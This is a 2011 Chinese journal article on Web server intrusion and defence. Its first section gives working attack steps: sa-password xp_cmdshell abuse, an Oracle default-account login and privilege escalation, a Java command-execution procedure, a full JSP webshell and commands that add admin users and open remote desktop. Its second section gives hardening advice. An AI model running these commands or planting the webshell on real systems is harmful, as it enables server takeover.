浅谈Web服务器入侵与安全防护

摘要：随着计算机普及、互联网INTERNET飞速发展，基于B/S端的信息系统，如办公自动化系统、电子政务、高校的教务系统等在各行各业普及使用，信息化进一步得到广泛应用。我们如何更好地保护Web服务器的安全使得B/S端信息系统平稳运行已显得不忽略的重要问题。该文以基于Windows 2003平台的多个应用服务，如Microsoft SQL Server 2000、Oracle 10g、JSP/ASP服务等应用，分析了Web服务器的常见入侵方式及安全防护。

关键词：B/S服务器；入侵分析；安全防护

中图分类号：TP311文献标识码：A文章编号：1009-3044(2011)01-0029-02

Talk about Intrusion and Safety of Web Server

HUANG Jing-hua

(Sontan College Guangzhou University, Zengcheng 511370, China)

Abstract: With the popularization of computers, the Internet INTERNET rapid development, based on B/S side of the information system, such as office automation systems, electronic government, universities and other educational systems in all walks of universal access, further information has been widely used. How can we better protect the security of Web server makes the B/S information system running smoothly client does not seem to have overlooked important issues. This Windows 2003-based platform for multiple applications such as Microsoft SQL Server 2000, Oracle 10g, JSP / ASP services, application, analysis of the common Web server intrusion methods and security protection.

Key words: B/S server; intrusion analysis; safety

近年来，计算机普及、互联网INTERNET飞速发展。B/S端类型的服务业务平台已在教育、政企、科研等多个领域中得到广泛的应用，很多企业都将应用系统从C/S类型向B/S类型转变，如财务管理系统、飞机售票系统、高校教务系统等。B/S端信息系统已在各行各业普及使用，如何有效解决Web服务器的安全是信息化成功、企业稳定发展的关键，也是推广Web业务不可缺少的前提因素。

1 入侵Web服务器方式分析

1.1 SQL入侵

Sa弱口令入侵。Sa是SQLServer的管理员帐号，拥有最高权限，它可以执行扩展存储过程，并获得返回值，正因为这样，如安装在Web服务器中SQL数据库sa用户的口令给黑客获得的话，黑客就可以在Web服务器为所欲为。入侵过程如下：

首先有sql查询分析器连接上Web服务器上的SQL数据库，在查询分析器上输入” exec sp_addextendedproc "xp_cmdshell", "Xplog70.dll" ”命令执行，目的让对方数据库SQL的存储过程xp_cmdshell能够正常有权限被使用。

接着在查询分析器里添加一个管理员用户，语句为 “exec master..xp_cmdshell "net user ceshi 98765321 /add" ；exec master..xp_cmdshell "net localgroup administrators ceshi /add"”。

最后在查询分析器里开启远程计算机的远程桌面服务，语句为“

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v EnableWinStation /t REG_DWORD /d 1“。

1.2 Oracle入侵

ORACLE数据库默认安装以后有很多帐户密码都是默认的，如果管理员安全意识不高很容易被人利用从而获得系统权限。

首先要使用lsctl得到对方的SID号。使用lsctl工具连接对方IP的listener，在CMD里输入lsctl 进入lsctl后 执行 Set current_listener 目标IP 和Status命令，这个时候可以看到服务 china 和modose 这2个有一个是SID号；

接着安装个ORACLE的客户端，使用Sqlplus连接服务器，格式 sqlplus DBSNMP/DBSNMP@//202.98.123.79:1521/china 成功登陆，执行 select * from user_role_privs; 可以看出当前用户只具有CONNECT权限。利用Oracle本地PL/SQL漏洞进行权限提升，成功提升为DBA权限，命令如下：

SQL> Exec ctxsys.driload.validate_stmt("grant dba to dbsnmp");

最后借用Oracle支持的Java特性，创建可以执行系统命令的存储过程，增加管理员账号(Windows平台的Oracle默认以system账号运行，所以我们执行的命令也是以system账号权限执行),下面创建一个JAVA源程序，以便执行系统命令。创建名为”util”的JAVA程序的主体代码如下：public static int RunThis(String args) { Runtime rt = Runtime.getRuntime(); int RC = -1; try {Process p = rt.exec(args); int bufSize = 4096;

BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);

int len; byte buffer[] = new byte[bufSize]; while ((len = bis.read(buffer, 0, bufSize)) != -1)

System.out.write(buffer, 0, len); RC = p.waitFor(); } catch (Exception e) { e.printStackTrace();

RC = -1; }

存储过程如下：create or replace function run_cmz(p_cmd in varchar2) return number as language java name "util.RunThis(java.lang.String) return integer"; 执行存储命令 exec :x:=run_cmz("cmd /c ver"); exec :x:=run_cmz("cmd /c "net user ceshi 98765321 /add "); exec :x:=run_cmz("cmd /c "net localgroup administrators ceshi /add");这样就可以添加了windows 2003系统用户，并提升到超级管理员的权限。如要开启远程计算机3389服务，只要执行如下命令：

exec :x:=run_cmz("cmd /c "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v EnableWinStation /t REG_DWORD /d 1 ");

1.3 上传漏洞的利用

这种技术方式是利用网站的上传功能来上传木马，正常来说，ASP/PHP/JSP为后缀的文件在网站是不允许上传，但是黑客会攻破这道防护，采取其它技术来上传ASP/PHP/JSP木马，获得服务器的WEBSHELL权限。如Ewebeditor组件在JSP/ASP/PHP开发起到很大作用，但却带来很大的安全隐患，它常被用作上传木马的手段。如JSP网站服务器，通过Ewebeditor可上传abc.jsp文件到服务器，abc.jsp文件代码如下：

<%@ page import="java.io.*" %><%String cmd = request.getParameter("cmd");

String output = "";if(cmd != null) {String s = null;try {

Process p = Runtime.getRuntime().exec(cmd);

BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));

while((s = sI.readLine()) != null) {output += s;}}catch(IOException e) {e.printStackTrace();}

}%>

在浏览器上面输入http://目标ip/abc.jsp?cmd= "net user ceshi 98765321 /add";

http://目标ip/abc.jsp?cmd="net localgroup administrators ceshi /add";

http://目标ip/abc.jsp?cmd=" REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v EnableWinStation /t REG_DWORD /d 1";

这样就可以添加了windows 2003系统用户，并提升到超级管理员的权限。如要开启远程计算机3389服务。

2 服务器安全防护---应对策略

2.1 架构安全的Web服务器

目前，比较主流的操作系统是Windows2003系统，但因其自身存在着许多系统漏涧及安全隐患，如何对服务器进行安全检测和安全配置显得十分重要。

1）安装操作系统时要选择NTFS文件格式，装完操作系统要杀毒软件。

2）安装系统补丁。扫描漏洞全面杀毒; 删除Windows Server 2003默认共享,命令如下：

@echo off ;

net share C$ /del;

net share D$ /del;

3）禁用IPC连接

在命令行输入如下命令即可进行连接：net use\目标ip\ipc$ "password" /user:"usernqme"。我们可以通过修改注册表来禁用IPC连接。打开注册表编辑器。找到如下组建HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa中的restrictanonymous子键，将其值改为1即可禁用IPC连接。

4）删除"网络连接"里的协议和服务

在"网络连接"里，把不需要的协议和服务都删掉，这里只安装了基本的Internet协议(TCP/IP)，同时在高级tcp/ip设置里--"NetBIOS"设置"禁用tcp/IP上的NetBIOS(S)"。

5）启用windows连接防火墙，只开放web服务(80端口)。

windows连接防火墙可以有效地拦截对Windows 2003服务器的非法入侵，防止非法远程主机对服务器的扫描，从而提高Windows 2003服务器的安全性。同时，它也可以有效拦截利用操作系统漏洞进行端口攻击的病毒，如冲击波等蠕虫病毒。如果在用Windows 2003构造的虚拟路由器上启用此防火墙功能，能够对整个内部网络起到很好的保护作用，因此我们只开放web服务器常用端口，如80端口。

2.2 构建数据库及程序的安全体系

1) 预防ACCESS数据库下载。把ACCESS数据库的扩展名mdb改为asp/php，通过这种方式来解决ACCESS数据库被识别下载。

2) 防SQL注入攻击。从程序的本身着手，对于用户输入的数据不能直接传参，最有效的方法还是通过存储过程来防止SQL注入。

3) 强化数据库密码的强度，防止数据库的密码泄露，定期修改数据库密码，保证数据库密码的安全。

3 结束语

随着网络飞速发展及B/S服务业务的广泛应用，服务器的安全问题是不可忽略的，防护与入侵这一对矛盾是永远存在的。本文结合工作实际，分析了Web服务器的入侵方式，给出了服务器安全防护的应对策略。

参考文献：

[1] 徐玉国,韩兆君.Web应用程序中的数据库安全策略[J].电脑知识与技术,2007(1):23.

[2] 寂寞的刺猬.上传漏洞的形成[J].黑客防线,2006(4):19-22.

[3] 王继龙.常见Web应用安全漏洞及应对策略[J].中国教育网络,2007(8):75-75.

推荐访问:浅谈 安全防护 入侵 服务器 Web